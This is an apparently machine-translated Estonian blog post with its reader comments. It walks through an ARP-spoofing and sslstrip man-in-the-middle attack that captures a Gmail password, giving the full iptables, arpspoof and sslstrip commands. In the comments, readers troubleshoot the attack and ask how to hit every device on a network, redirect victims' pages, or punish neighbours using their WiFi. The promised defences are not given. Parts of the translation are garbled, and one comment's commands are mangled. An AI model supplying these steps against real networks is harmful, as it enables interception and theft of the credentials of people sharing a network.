Tere, blogijad.
Tänaseks on mul väike proov sellest, kui ohtlik võib olla ühenduse loomine mis tahes võrgus ilma nende turvalisuseta, mis nii paljudele meist meeldivad.
Tänaseks kavatsen Gmaili parooli saamiseks kasutada ArpSpoofingi koos Sslstripiga. Keskkonna kontrollitavamaks muutmiseks olen loonud konto nimega "testarp@gmail.com".
Ja kuna mulle ei meeldi preambulid väga, siis asume asja kallale.
KESKKOND
Selle testi jaoks on meil järgmine:
1. Ründaja: Debian Wheezy on minu töölaual või lauaarvutil. Hoidlatest saate installida sslriba y nuusutama saada harfivargus
2. Ohver: Ohver on Android-tahvelarvuti, mis soovib oma kirju näha ainult brauseri kaudu.
3. Keskkond: Keskel on minu Cisco DPC2425 ruuter
AADRESSID.
Ründaja aadress: 172.26.0.2
Ruuteri aadress: 172.26.0.1
Ohvri aadress: 172.26.0.8
Rünnak:
Esimene asi, mida me selle rünnaku jaoks teeme, on aktiveerida edasiliikumine, et meie arvuti saaks teabe ohvrile edastada ilma, et ta seda märkaks. (Muidu oleks see teenuste keelamise rünnak)
Selleks kasutame:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Nüüd, kui teeme saba -f desdelinux me näeme teavet otse ja otse
Kuidas siis saada see, mida tahame?
Sisestame kõigepealt oma meilid tahvelarvutisse. Sisselogimisel näeme, et meie konsoolile ilmub tuhandeid ja tuhandeid asju.
Nüüd, kui see on lõpetatud, avame oma faili "desdelinux” nano-ga
nano desdelinux
Control + W abil otsime midagi nimega TURVAPOSTITUS.
Ja me näeme midagi sellist.
Selle tohutu joone hulgas on ohvri e-posti aadress ja parool.
Niisiis jookseme paremale, kuni lõpuks tunneli lõpus valgust näeme.
Teisel korral näeme, kuidas saame end nende rünnakute eest veidi kaitsta.
seoses
Kasutan võimalust ja ütlen, et postituse avaldamise ajal ei olnud käsud õiged.
Lõpus oleval käsul iptables puudub 8080, mis asub teisel real. Ja siis olid arpspoofi käsud kõik ühel joonel. Iga käsk on erineval real.
Loodetavasti näeb toimetaja seda ja suudab selle parandada.
Tervitused.
Olen teinud teie mainitud parandused, kas see on ok?
Kui soovite sisestada koodi eelistatud kirjesse, kasutage HTML-vaadet ja veenduge, et artikkel oleks enne ootele saatmist õige. Aitäh.
On jahutav teada, et need meist, kellel teadmisi pole, on nii haavatavad. Väga hea teave, isegi kui mõistan teemast vähe, mõistan selle olulisust. Aitäh!
seoses
Kuid see töötab ainult siis, kui ründaja ja ohver on ühes võrgus. Igal juhul tundub mulle, et kui (samas võrgus olles) ühenduse luua HTTPS-i abil, siis seda ei juhtu, kuna andmed krüpteeritakse ENNE teie arvutist lahkumist. Kui ühendate ühenduse HTTP-ga (ilma S-iga), arvan, et isegi võrgukaablit vaadates näete võtmeid.
See ei ole tõsi. Häkin gmaili parooli ja kui märkate, kasutab gmail https-i. Niisiis? Asi on selles, et kuigi https on turvaline, sõltub see http-ist. Nii et see pole nii ohutu.
Ärge tunnistage https-i kohta nii palju, et S pole mõeldud Supermani jaoks, vaid "ohutuks"
see töötab koos https-iga või ilma, olen seda proovinud spetsiaalsema linux distro abil ja see töötab probleemideta
Saate seda täpselt kasutada, et õpetada neile, kes teie WiFi varastavad, õppetunni. 😀
See on enam-vähem sarnane sellega, mida nad juba ammu Chema Alonso ajaveebis ütlesid:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, suurepärane, mida see teeb! / Ja siis nad ütlevad mu paranoiale iga kord, kui ma kasutan VPN-i, kui nad lähevad pangakontot kontrollima ...). Muide, kommentaarides peate nägema, kui küünilised inimesed on ... kui see lõpuks varastab ...
Nüüd peame võtma õpetuse oma VPN-teenuse loomiseks ja pakkumiseks.
Teie lingitud lugu on väga huvitav, tundub isegi romaaniraamatu vääriline ja see paneb mind meenutama, kui kasutasin oma naabrite internetti ja ehkki ütlen, et tean seda teemat, arvan, et ei suutnud iialgi näha selle raamatu tegelikke mõõtmeid oht, et ma oleksin võinud kesta, minu õnneks muutsid nad parooli ainult WPA2-ks ja sealt algas minu lugu ISP-ga haha
Sellepärast ütleb pealkiri, et Sslstrip on tegevuses.
See töötab, kui ründaja on keskel
Mis lainet te töötate prismas? -.-
no.
Mida ootate oma taotluse saatmiseks XD
osas
hea postitus
Huvitav, ma teen hiljem hariva testi ... Võib-olla saaksin isegi WiFi parooli eemaldada ja natuke lõbutseda 😛
Kas saate juhuslikult teha midagi sarnast, et saata erinevad lehed sihtmärgi lehtedele? Näiteks tahavad nad avada Facebooki ja ma suunan nad Google'i? 😛
Jah. Kuid see kõik on väga erinev rull.
Võib-olla postitan selle hiljem.
väga hea postitus, need teemad on väga harivad, nüüd peame suutma sellele rünnakule vastu astuda, kuna mõned (nagu mina) ühenduvad avalike võrkudega (näiteks ülikool), oleks kasulik sellest hoiduda.
Tervitused!
Minu jaoks see ei töötanud 🙁
Midagi ebaõnnestub siin, välja arvatud see, et https-ühendused krüptitakse serverisertifikaadi kaudu (kui teie arvutis on sertifikaat olemas, krüptimise eest vastutab teie brauser) iptablesiga, mille suunate porti 80 (http) , mitte 443, mis on https
Mõtlesin ka seda. Asi on selles, et kuigi https on "turvaline", sõltub see kahjuks http-ist. Nii et sslstrip kasutab seda ära, see paneb brauseri uskuma, et ta kasutab https-i mandaate, kuid mitte.
püha pask! kuid brauser peaks nägema sellist hoiatust nagu "see sertifikaat pärineb kahtlaselt saidilt või midagi sellist" ... pean kindlasti tegema teste XD
Ei, absoluutselt mitte midagi ei tule välja.
Lõpuks töötas see minu jaoks
Olen ühendatud parooliga WEP-võrgus ja see näitas mulle igatahes otse parooli.
Päring. Kas saate teha sama protseduuri, kuid kõigi võrku ühendatud arvutite puhul, selle asemel, et teil oleks üks ohver?
Jah, sa saad. Kuid ma pole katseid teinud. Proovige ise ja rääkige, kuidas teil läheb.
Ainus asi, mis mul sellega kaasneb, on see, et ohvri masin läheb võrguühenduseta, kuid sslstrip ei näita mulle midagi: /
Peate korraks tulemüüri keelama. Või vähemalt lubage sissetulevad ühendused.
Sondiga nägime ainult facebooki lehe kasutajanime ja parooli, gmailist ei leidnud logist ühtegi tulemust, samuti vajasin ainult arpspoofi rida «arpspoof -i -t«. Teisalt ei suutnud ohvrimasin mõnda lehte avada. Jätkan uurimist, see on väga huvitav. Abi neile, kes kasutavad Manjarot, installimiseks on paketid: dsniff (siin on arpspoff), keerutatud ja python2-pyopenssl. Sslstrip saab alla laadida siit: http://www.thoughtcrime.org/software/sslstrip/
Selle käivitamiseks $ python2 sslstrip.py
Tervitused.
See ei tulnud välja, kuid arpspoof-rida on: #arpspoof -i int -t ip-ohver ip-ruuter
ma teen täpselt seda, mida sa ütled:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp - sihtkoha port 80 -j REDIRECT - portidesse 8080
arpspoof -t -i eth0 172.26.0.8 172.26.0.1
arpspoof -t -i eth0 172.26.0.1 172.26.0.2
Probleem on selles, et ohver, kes on veel üks arvuti, mis mul siin toas on, jääb ilma ühenduseta punktini, et pean ruuteri taaskäivitama, mida ma saan teha, mind aidata.
Teine asi, mida ma töötan virtuaalmasinaga, ja kui täidan käsu iwconfig, ei ilmu ka wlan0 ega ifconfig-i käivitamisel, aga kui mul on virtuaalses masinas Internet, siis eth0-liidesega.